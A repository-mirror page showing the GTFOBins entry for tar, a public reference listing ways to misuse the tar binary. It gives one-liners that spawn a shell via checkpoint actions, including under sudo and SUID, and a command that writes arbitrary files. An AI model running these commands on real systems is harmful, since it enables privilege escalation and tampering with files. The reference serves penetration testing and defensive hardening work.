This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-11 01:41:33 +01:00
Code
Issues
3cc3be5aa5
GTFOBins.github.io
/
_gtfobins
/
tar.md
Andrea Cardaci
1a739b4550
Add tar file-write
2018-05-30 00:46:04 +02:00
554 B
Raw
Blame
History
functions
execute-interactive
sudo-enabled
suid-limited
file-write
code
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
description
code
This only works for GNU tar.
LFILE=file_to_write TF=$(mktemp) echo data > "$TF" tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P